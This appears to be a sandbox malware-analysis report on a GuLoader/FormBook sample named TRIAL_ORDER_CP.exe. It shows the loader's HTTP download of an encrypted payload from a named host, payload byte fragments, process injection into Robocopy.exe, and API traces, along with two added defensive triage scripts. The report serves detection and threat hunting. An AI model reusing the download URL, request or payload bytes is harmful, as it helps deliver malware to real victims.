Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 12:25:20.899656057 CEST | 175 | OUT | GET /.ex/ELFyaa85.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: sz.zxg6.za.com
                                        Cache-Control: no-cache
Aug 28, 2024 12:25:21.088315964 CEST | 1289 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 28 Aug 2024 10:25:20 GMT
                                        Server: Apache
                                        Last-Modified: Wed, 28 Aug 2024 02:57:37 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 288832
                                        Content-Type: application/octet-stream
                                        Data Raw: 56 7b 8f ca 82 f2 8b 70 d0 d3 47 21 07 a5 b0 1d 03 ea b1 e3 ae 6c 1c 14 5b 47 cd e0 4c 6b 43 03 5c d3 95 92 91 97 30 92 7e 8d f6 cf 0e b5 85 27 f4 92 0f 58 98 53 92 0c 72 71 4a 88 d7 56 69 d8 fc 48 e7 3a 99 cd 70 66 4f a3 d6 7a 62 a7 2a 00 4b e7 82 76 c2 3a c4 8d ae 48 3b fb a5 cb ca 79 99 9c 2d 3c d2 2c f3 52 93 4a ac 47 b6 cb d1 2e 3a 12 62 b1 f3 55 46 b1 b5 05 65 44 a6 cf 2e ed c6 08 db eb c0 e4 0b 02 dd a7 ba de 72 16 c1 86 bd c7 01 f1 1b 9d 98 55 0f 49 92 e7 2a c1 31 ca c1 b8 55 87 36 11 1c 8e 88 1a f6 48 a8 ae 6c 2e b3 f1 41 42 b7 22 46 de 8c c3 61 ac 2f d7 96 86 79 f8 ca 39 b6 d0 72 ab 54 c9 ad 76 ef 3d 59 1b 5c 83 2f e6 18 c9 b1 bf 38 7f f8 3b 56 29 56 79 69 27 e0 7a d9 0a 24 37 50 06 d4 ab e6 42 df 8b 60 cd b3 8c f8 1c 7b 2e 6e 27 2f a1 60 96 ec bb 4e 97 09 4b 84 07 d8 c9 60 eb 2c 9f 64 f3 00 0c ec ed 4e 59 6f ce ee f3 b6 89 9d 1d de 82 18 8f 02 f2 07 3d a1 6d 55 52 ff ad d1 a1 7d 01 e1 df 42 2c 50 e7 eb 80 b9 39 23 16 00 74 ed cb b9 f1 00 e6 56 3c 28 f5 af df 3e 9e 1d 99 d3 3a 1e 7b 5d 16 [TRUNCATED]
                                        Data Ascii: V{pG!l[GLkC\0~'XSrqJViH:pfOzb*Kv:H;y-<,RJG.:bUFeD.rUI*1U6Hl.AB"Fa/y9rTv=Y\/8;V)Vyi'z$7PB`{.n'/`NK`,dNYo=mUR}B,P9#tV<(>:{]xp-!{Ako'~(BK|!-3i_F5ML=nRI_LHle5C5r0KxeJr}j5d3~qHGV<#U8w.[8iqWcrQM\^AA/5"2X-s@Iw+$2lZt3B\beAIk):{b"zyq!|v7Q*xjUgC$\yz>N~1H-`*4[@f@T01R5\O"H,xcx)9qlcd:Ht]y)Gz7;Msz}u>^0h:{3r;{f(t60x6#:3[iV-0vuNs<%\3H`0TU9y24`AUF<R-ZxQ{sE9)KS`L*!*L|*d]FSH&p6LY5?poqc@Mo: [TRUNCATED]
Aug 28, 2024 12:25:21.088330984 CEST | 1289 | IN | Data Raw: 43 cd c0 23 13 ee ee 02 30 0a 87 43 b9 2a 19 28 4d d2 e6 4d a2 a5 36 d9 4d 04 a5 bd eb ef 32 85 91 a4 ea 11 c3 37 f0 9c c3 12 29 62 b1 19 63 92 0d de 40 a7 0d 21 09 ca 7f 9b 08 e0 76 25 0a fb a0 a1 69 d2 db 41 37 ac f3 70 43 9c 77 d8 83 9b 8f 9e
                                        Data Ascii: C#0C*(MM6M27)bc@!v%iA7pCw]=1Q{)L;@nTRKUOA&brM]S6UrK!H)aj@I?^v`=^Qxw;;N<
Aug 28, 2024 12:25:21.088432074 CEST | 1289 | IN | Data Raw: 33 9a 48 60 30 d4 c4 54 81 ec 55 8f 14 95 d0 b2 89 d1 b2 f6 10 1b d7 a6 39 b9 fd 99 fd da a7 8e 8e fc 79 c1 32 34 88 ca 9f bd d1 60 41 d1 55 46 3c 1d 11 52 9e 2d a6 5a d8 78 97 f5 51 7b 8d 8e 8d 73 87 45 bf c4 b3 39 fa c5 29 14 19 c1 4b 10 d0 19
                                        Data Ascii: 3H`0TU9y24`AUF<R-ZxQ{sE9)KS`L*!*L|*d]FSH&p6LY5?poqc@Mo:Ux:]MX%j}9:SVMz|;2z:z;~-6C#0
Aug 28, 2024 12:25:21.088445902 CEST | 1289 | IN | Data Raw: 7a b8 d2 9b ab e2 e4 0c aa 0d 3e bf 4e 7e 16 ae 31 fb 80 04 48 e6 f3 2d fd 60 dd 99 2a b7 34 fe 5b f9 40 66 8b cf 16 b1 15 a6 bd d6 40 a3 a0 54 86 30 0d b1 f4 99 f9 d7 31 52 35 5c 4f 22 a9 9c a5 a3 19 ec f0 48 99 01 2c 8d 78 9f 96 db a2 c5 bb 63
                                        Data Ascii: z>N~1H-`*4[@f@T01R5\O"H,xcx)9qlcd:Ht]y)Gz7;Msz}u>^0h:{3r;{f(t60x6#:3[iV-0vuNs<%\3H`0T
Aug 28, 2024 12:25:21.088458061 CEST | 1289 | IN | Data Raw: e4 53 73 de d9 97 52 c6 37 4c 4b b0 a8 67 0e b5 af 6d 6b 20 aa f4 7b b4 9d 55 8f 5c 89 28 c5 a1 67 99 a7 22 61 d3 22 cf 40 42 76 f3 cb f2 46 65 4a 0e 32 a8 56 5b fb d9 a8 69 9f e4 89 4a 6f d5 bb 34 cf 83 ef cd 3c 52 2c 7d 7d 87 9a 26 0d eb ad 51
                                        Data Ascii: SsR7LKgmk {U\(g"a"@BvFeJ2V[iJo4<R,}}&Q`Hfd4X}27[Xr<&S3Y@,r@pjo/=Th6@CB\QSTJ.i:xa/mu5VBZ'!$zJW\%
Aug 28, 2024 12:25:21.088469028 CEST | 1289 | IN | Data Raw: f2 ff 27 55 ee bd cb 81 e7 2a 5d 5d 57 2c e2 16 ee e4 e4 56 8c 67 e1 69 bd c1 f1 21 17 a8 0f 64 d0 b4 e7 57 04 24 54 f9 d7 96 86 bb 2d c3 99 8b 3b 19 5f e8 58 5a 27 ec 5c b7 65 42 db 78 ea a7 72 a2 5f 9a a4 31 12 6e be da 4b 89 83 c0 53 24 81 5c
                                        Data Ascii: 'U*]]W,Vgi!dW$T-;_XZ'\eBxr_1nKS$\ZH6y.>b yowk&sc!l}(uGvWOT@45e+xe?^)D<_oa\F%f?LlJ -(<T,r:<$N|
Aug 28, 2024 12:25:21.088499069 CEST | 1289 | IN | Data Raw: 43 c3 df fb 6f 3d 95 81 c4 48 cd 77 75 53 7e fd af 67 1a d0 32 57 91 cd 17 f0 43 e5 43 ab d2 3b 5e d1 7a 08 ff cb 4f 37 ea a0 3e 0f 17 65 b0 40 47 91 76 a5 7f ee c6 78 82 e0 a7 59 ff bb 1e 20 1a 65 f7 b8 63 a2 4e 36 35 00 fd c5 aa 9c d5 c9 fe d2
                                        Data Ascii: Co=HwuS~g2WCC;^zO7>e@GvxY ecN65B]}#JtxQ{{*^R{jZ<N&;150G`U/ocCp.z7HG.:ZLxJgdo"S|f<iFj`K
Aug 28, 2024 12:25:21.088614941 CEST | 1289 | IN | Data Raw: 28 7d 77 39 83 ca 26 10 99 5c 00 dc 95 4c b4 de 4e ae d5 4f db 43 d1 e7 91 67 66 52 5f ea ad e5 ae c1 ce 72 90 f2 7f 9c db 72 4b 2d c2 9d cc 00 51 3a 0e e9 d9 a8 f3 19 73 c4 f8 c1 ab 8d 23 53 7d 54 f5 b8 00 0f 09 b5 3b 27 6d a7 af c0 47 eb 04 21
                                        Data Ascii: (}w9&\LNOCgfR_rrK-Q:s#S}T;'mG!+eK1'\o0N<c+L6;w!i[<5zXl(d%uuK8&HWH4c$y^|0%S<8ZvvCbi!i9
Aug 28, 2024 12:25:21.088645935 CEST | 1289 | IN | Data Raw: c4 eb a7 58 c2 89 cc 34 d7 c2 70 c3 b4 e1 d6 8e 7c 0a 8b 85 83 40 ec 71 4c 45 71 06 e1 16 e4 ff df e8 27 d1 4a 99 65 c1 a3 55 aa 61 40 1e f5 e9 6c 48 c2 6f 6f 05 b1 3f 48 fe a7 8d 6c 5c af f4 b6 8d 00 d4 22 ed a0 25 6a 7d 39 c4 8f f4 da 3a 53 56
                                        Data Ascii: X4p|@qLEq'JeUa@lHoo?Hl\"%j}9:SV5m?~es8l3QY@0u*((MMxeJ7J)*cAAm%U[k\?A4a$vf^C{*JL\kmt
Aug 28, 2024 12:25:21.088658094 CEST | 1289 | IN | Data Raw: f1 b8 f1 79 93 55 7a e9 f1 bc c4 b3 4a f1 c4 bf 3b 0f 85 2a e2 4d 31 77 d7 30 d2 b0 cf 93 3a 20 2d 3a e8 4e df 7b c0 05 f9 7e 3b 97 e1 8a b8 08 36 34 4a b1 a7 d8 d5 46 06 c6 6d f4 0a 0f a9 4f d7 76 96 36 63 f2 95 b1 e1 4b d1 f3 c0 24 52 73 3a ee
                                        Data Ascii: yUzJ;*M1w0: -:N{~;64JFmOv6cK$Rs:-YQ'?L:nN8S8#&G)TT'[H+}>:st.vq24!./RP7zaL}[&2({p8eU25 )29U
Aug 28, 2024 12:25:21.273863077 CEST | 1289 | IN | Data Raw: b3 dc 98 62 5e de 34 ae 2a f3 67 49 36 05 15 c1 78 af 89 60 32 54 02 9c d8 e8 1d 3c e8 fc 20 cb e8 88 66 39 97 51 1b 13 23 a1 cd cb 21 01 ea 50 63 6e 21 b8 ae 0d 34 63 f5 ec e0 55 34 4e 58 0c 49 a2 df 90 6b 53 8e 23 d2 61 f6 e1 5c 2e 79 b7 cb 9f
                                        Data Ascii: b^4*gI6x`2T< f9Q#!Pcn!4cU4NXIkS#a\.y gGb^p~e}2j%*,C$JtX\@?Z%2SlEJDXFIgV:5X5\OD.5!LBHa7"^9e|#XeWl\nsMJx
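The network section above is the part of this report a hunter actually reuses: the DNS answer ties sz.zxg6.za.com to 38.242.218.41, the single TCP flow 49865<->80 carries the transfer, and the HTTP exchange shows the loader fetching a 288832-byte application/octet-stream blob named ELFyaa85.bin while presenting a Firefox User-Agent from a process that is not a browser. The report extract runs the table columns together, so the timestamp, ports and addresses have to be pulled apart before any of that can be correlated. The following script is an added example written for this page, not Joe Sandbox code: its regexes, its way of resolving the ambiguous "portportIPIP" strings (keep the reading whose mirror image appears as the reply direction, then prefer a service port paired with a Windows ephemeral port), and the three flagging reasons are this example's own. The sample lines are copied from the tables above; the owning process name is taken from the HTTP session table.

```python
"""Reconstruct the run-together Joe Sandbox network tables (TCP packets, DNS
answer, HTTP stream) and correlate them into one download indicator.
Added example for this page; regexes and heuristics are this example's own."""
import re
from itertools import product

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
TS = r"[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4}"
TCP_ROW = re.compile(rf"^({TS})([\d.]+)$")           # timestamp + ports + IPs
HTTP_ROW = re.compile(rf"^({TS})(\d+)(IN|OUT)(.*)$")  # timestamp + bytes + direction
HEADER = re.compile(r"^([A-Za-z][\w-]*): (.*)$")      # "Host: ..." style lines
DNS_ANSWER = re.compile(rf"0x[0-9a-f]+No error \(0\)([\w.-]+?)({IPV4})A \(IP address\)")

# Constructed sample: lines copied verbatim from the report extract above
# (three rows of the 49865<->80 flow, the DNS answer, request and response).
SAMPLE = """\
Aug 28, 2024 12:25:21.650294065 CEST804986538.242.218.41192.168.11.20
Aug 28, 2024 12:25:21.650440931 CEST4986580192.168.11.2038.242.218.41
Aug 28, 2024 12:25:42.969021082 CEST4986580192.168.11.2038.242.218.41
Aug 28, 2024 12:25:20.709916115 CEST1.1.1.1192.168.11.200xc92fNo error (0)sz.zxg6.za.com38.242.218.41A (IP address)IN (0x0001)false
Aug 28, 2024 12:25:20.899656057 CEST175OUTGET /.ex/ELFyaa85.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: sz.zxg6.za.com
Aug 28, 2024 12:25:21.088315964 CEST1289INHTTP/1.1 200 OK
Content-Length: 288832
Content-Type: application/octet-stream
"""

def _valid_port(s):
    return s.isdigit() and not (len(s) > 1 and s[0] == "0") and int(s) <= 65535

def _valid_ip(s):
    octets = s.split(".")
    return len(octets) == 4 and all(_valid_port(o) and int(o) <= 255 for o in octets)

def tcp_candidates(rest):
    """Every (sport, dport, src, dst) reading of a run-together TCP row."""
    out = []
    for i, j in product(range(1, 6), repeat=2):
        sport, dport, ips = rest[:i], rest[i:i + j], rest[i + j:]
        if _valid_port(sport) and _valid_port(dport):
            for k in range(7, len(ips) - 6):
                if _valid_ip(ips[:k]) and _valid_ip(ips[k:]):
                    out.append((int(sport), int(dport), ips[:k], ips[k:]))
    return out

def resolve_tcp(lines):
    """Keep, per row, the reading whose mirror image (the reply direction) is
    also a reading of some row; if still ambiguous prefer a service port
    (<1024) paired with a Windows ephemeral port (>=49152)."""
    rows = [(m.group(1), tcp_candidates(m.group(2)))
            for m in map(TCP_ROW.match, lines) if m]
    universe = {c for _, cs in rows for c in cs}
    resolved = []
    for ts, cs in rows:
        pick = [c for c in cs if (c[1], c[0], c[3], c[2]) in universe] or cs
        if len(pick) > 1:
            pick = [c for c in pick if min(c[:2]) < 1024 and max(c[:2]) >= 49152] or pick
        resolved.append((ts, pick[0] if len(pick) == 1 else None))
    return resolved

def http_messages(lines):
    """Group the HTTP stream into request/response dicts with their headers."""
    msgs = []
    for line in lines:
        m, h = HTTP_ROW.match(line), HEADER.match(line)
        if m:
            msgs.append({"dir": m.group(3), "bytes": int(m.group(2)),
                         "start": m.group(4), "headers": {}})
        elif msgs and h:
            msgs[-1]["headers"][h.group(1).lower()] = h.group(2)
    return msgs

def download_indicators(text, client_process):
    """Correlate DNS answer, TCP flow and HTTP exchange and list the reasons a
    hunter would flag the transfer. client_process is the owning process from
    the HTTP session table."""
    lines = text.splitlines()
    flows = [f for _, f in resolve_tcp(lines) if f]
    msgs = http_messages(lines)
    req = next(m for m in msgs if m["dir"] == "OUT")
    resp = next(m for m in msgs if m["dir"] == "IN")
    dns = DNS_ANSWER.search(text)
    host, path = req["headers"]["host"], req["start"].split()[1]
    # the lower port is the service side, so that side's address is the server
    server_ips = {f[2] if f[0] < f[1] else f[3] for f in flows}
    reasons = []
    if dns and dns.group(1) == host and dns.group(2) in server_ips:
        reasons.append(f"{host} resolved to {dns.group(2)}, the server of the tcp/{min(flows[0][:2])} flow")
    if (resp["headers"].get("content-type") == "application/octet-stream"
            and not path.lower().endswith((".exe", ".dll", ".msi"))):
        reasons.append(f"binary body of {resp['headers'].get('content-length')} bytes under non-PE name {path}")
    if "Firefox" in req["headers"].get("user-agent", "") and not client_process.lower().startswith("firefox"):
        reasons.append(f"browser User-Agent sent by {client_process}")
    return {"url": f"http://{host}{path}", "server_ip": dns.group(2) if dns else None,
            "content_length": int(resp["headers"]["content-length"]),
            "packets": len(flows), "reasons": reasons}

if __name__ == "__main__":
    for key, val in download_indicators(SAMPLE, "TRIAL_ORDER_CP.exe").items():
        print(f"{key}: {val}")
```

The mirror-image rule is what makes the port split safe: the forward row also parses as 804/9865 or 8049/865, but only 80/49865 has a matching reply row, so no port list has to be hard-coded. Feed the full TCP table from the report and `packets` becomes the real segment count for the flow.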

                                        Target ID:0
                                        Start time:06:24:15
                                        Start date:28/08/2024
                                        Path:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
                                        Imagebase:0x400000
                                        File size:1'014'480 bytes
                                        MD5 hash:5A14D64B70FC7106CB6C14BE1AAA7482
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.270766627678.0000000004C73000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:06:25:11
                                        Start date:28/08/2024
                                        Path:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
                                        Imagebase:0x400000
                                        File size:1'014'480 bytes
                                        MD5 hash:5A14D64B70FC7106CB6C14BE1AAA7482
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:5
                                        Start time:06:25:33
                                        Start date:28/08/2024
                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                        Imagebase:0x140000000
                                        File size:16'696'840 bytes
                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:6
                                        Start time:06:25:33
                                        Start date:28/08/2024
                                        Path:C:\Windows\SysWOW64\Robocopy.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                        Imagebase:0x1e0000
                                        File size:142'336 bytes
                                        MD5 hash:6B2AE9D48535CE68D53D56E65248BB4C
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:7
                                        Start time:06:28:07
                                        Start date:28/08/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff707160000
                                        File size:4'849'904 bytes
                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

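As an added example (not part of the Joe Sandbox report and not Joe Security's code), the script below parses per-process blocks in the plain "Key:Value" layout used above and flags the pattern that matters in this run: a Microsoft binary under C:\Windows (Robocopy.exe, Target ID 6, launched 32-bit with no arguments) whose memory regions matched FormBook Yara rules, while the legitimate RAVCpl64.exe and explorer.exe processes did not. The reading of the dotted Yara "Source" name (first field = process Target ID, fourth field = base address of the dumped region) is an assumption the report does not document; the Yara match inside a system binary is the hard signal, the other indicators are supporting context.

```python
"""Triage helper for the per-process 'Target ID' blocks of a Joe Sandbox text report.

Added example, not part of the original report and not Joe Security tooling.
Assumption (the report does not document it): in the dotted Yara 'Source' name the
first field is the process Target ID and the fourth is the dumped region's base address.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample input: the Robocopy.exe block (trimmed) copied from the report
# above plus a trimmed copy of the explorer.exe block, so the script runs offline.
SAMPLE = r"""
Target ID:6
Path:C:\Windows\SysWOW64\Robocopy.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
MD5 hash:6B2AE9D48535CE68D53D56E65248BB4C
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:low
Has exited:true

Target ID:7
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Reputation:high
Has exited:false
"""

RULE_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<src>\S+),\s*Author:\s*(?P<author>.*)$"
)
IMAGE_RE = re.compile(r'^\s*(?:"[^"]*"|\S+)')  # first (possibly quoted) token of a command line

@dataclass
class YaraHit:
    rule: str
    description: str
    author: str
    target_id: int  # assumed: first dotted field of Source
    base: int       # assumed: fourth dotted field of Source, hexadecimal

@dataclass
class Process:
    target_id: int
    fields: Dict[str, str]
    yara: List[YaraHit] = field(default_factory=list)

@dataclass
class Finding:
    target_id: int
    image: str
    rules: List[str]
    regions: List[int]
    reasons: List[str]

def parse_yara_line(line: str) -> YaraHit:
    m = RULE_RE.search(line)
    if not m:
        raise ValueError(f"unrecognised Yara line: {line!r}")
    parts = m.group("src").split(".")
    return YaraHit(m.group("rule").strip(), m.group("desc").strip(), m.group("author").strip(),
                   int(parts[0], 10), int(parts[3], 16))

def parse_blocks(text: str) -> List[Process]:
    """Split the report text into 'Target ID' blocks separated by blank lines."""
    procs: List[Process] = []
    for raw in re.split(r"\n\s*\n", text.strip()):
        fields: Dict[str, str] = {}
        hits: List[YaraHit] = []
        for line in raw.splitlines():
            line = line.strip()
            if line.startswith("•"):          # bullet lines are individual Yara hits
                hits.append(parse_yara_line(line))
            elif ":" in line:                 # everything else is Key:Value
                key, value = line.split(":", 1)
                fields[key.strip()] = value.strip()
        procs.append(Process(int(fields["Target ID"]), fields, hits))
    return procs

def has_arguments(cmdline: str) -> bool:
    """True when anything follows the image path on the command line."""
    return bool(IMAGE_RE.sub("", cmdline, count=1).strip())

def injection_suspects(procs: List[Process]) -> List[Finding]:
    """A Windows binary whose memory matches a malware-family rule is running
    code that is not its own; the remaining checks only add supporting context."""
    findings: List[Finding] = []
    for p in procs:
        path = p.fields.get("Path", "")
        if not p.yara or not path.lower().startswith("c:\\windows\\"):
            continue
        reasons = ["malware-family Yara match inside the memory of a Microsoft binary"]
        if not has_arguments(p.fields.get("Commandline", "")):
            reasons.append("system utility launched with no command-line arguments")
        if p.fields.get("Wow64 process (32bit)", "").lower() == "true":
            reasons.append("32-bit (Wow64) host process")
        if p.fields.get("Reputation", "").lower() == "low":
            reasons.append("sandbox reputation rated low")
        findings.append(Finding(p.target_id, path, sorted({h.rule for h in p.yara}),
                                sorted({h.base for h in p.yara}), reasons))
    return findings

if __name__ == "__main__":
    for f in injection_suspects(parse_blocks(SAMPLE)):
        print(f"Target {f.target_id}: {f.image}")
        print("  rules:  ", ", ".join(f.rules))
        print("  regions:", ", ".join(hex(b) for b in f.regions))
        for reason in f.reasons:
            print("  -", reason)
```

Run as a script it prints the triage for the embedded sample (Target 6, both FormBook rules, region bases 0x29c0000 and 0x43d0000, four reasons); for a real case pass the text of a complete report to parse_blocks, which tolerates the extra Key:Value fields the full blocks carry.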

                                          Execution Graph

                                          Execution Coverage:28.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:18.8%
                                          Total number of Nodes:709
                                          Total number of Limit Nodes:20
                                          [Execution graph: rendered on the original page as an interactive node/edge diagram; the flattened node and edge text is not reproduced. Recoverable content: two regions of executed code.
                                          • Installer stub at 0x40xxxx, entry 0x40352f: SetErrorMode, GetVersionExW, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW; file handling via GetFileAttributesW, CreateFileW, ReadFile, WriteFile, SetFilePointer, MoveFileExW, CopyFileW, DeleteFileW, CreateDirectoryW, RemoveDirectoryW, FindFirstFileW/FindNextFileW; CreateProcessW; registry reads via RegOpenKeyExW, RegQueryValueExW, RegCloseKey; GetModuleHandleA, LoadLibraryExW, GetProcAddress; dialog and window handling (DialogBoxParamW, CreateDialogParamW, SendMessageW, SetWindowTextW, MessageBoxIndirectW); and a shutdown path through GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx and ExitProcess.
                                          • Module mapped at 0x7068xxxx: GlobalAlloc, GlobalFree, GlobalSize, VirtualAlloc, VirtualProtect, VirtualFree, CreateFileA, GetLastError, GetModuleHandleW, LoadLibraryW, GetProcAddress, FreeLibrary, WideCharToMultiByte, MultiByteToWideChar, CLSIDFromString, StringFromGUID2, lstrcpyW, lstrcpynW, wsprintfW.]

                                          Control-flow Graph

                                          [Control-flow graph of the function at 0x40352f (basic blocks 0x40352f through 0x403b46), colour-coded on the original page as Executed / Not Executed; the flattened block and edge text is not reproduced. This is the routine whose API calls are listed under APIs below: version and environment setup, temp-directory and TEMP/TMP handling, file copy and delete, and the privilege-adjust / ExitWindowsEx / ExitProcess exit path.]
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403552
                                          • GetVersionExW.KERNEL32(?), ref: 0040357D
                                          • GetVersionExW.KERNEL32(?), ref: 00403590
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403629
                                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403666
                                          • OleInitialize.OLE32(00000000), ref: 0040366D
                                          • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                          • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004036A1
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000020,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DA
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 00403812
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403823
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040382F
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403843
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040384B
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040385C
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403864
                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403878
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000000,0000000A), ref: 00403951
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                          • wsprintfW.USER32 ref: 004039AE
                                          • GetFileAttributesW.KERNEL32(964,C:\Users\user\AppData\Local\Temp\,964,?), ref: 004039E1
                                          • DeleteFileW.KERNEL32(964), ref: 004039ED
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,964,?), ref: 00403A1B
                                            • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,964,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                            • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                            • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                            • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                          • OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403A7F
                                          • ExitProcess.KERNEL32 ref: 00403A9C
                                          • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,964,00000000), ref: 00403AA3
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403ABF
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403AC6
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
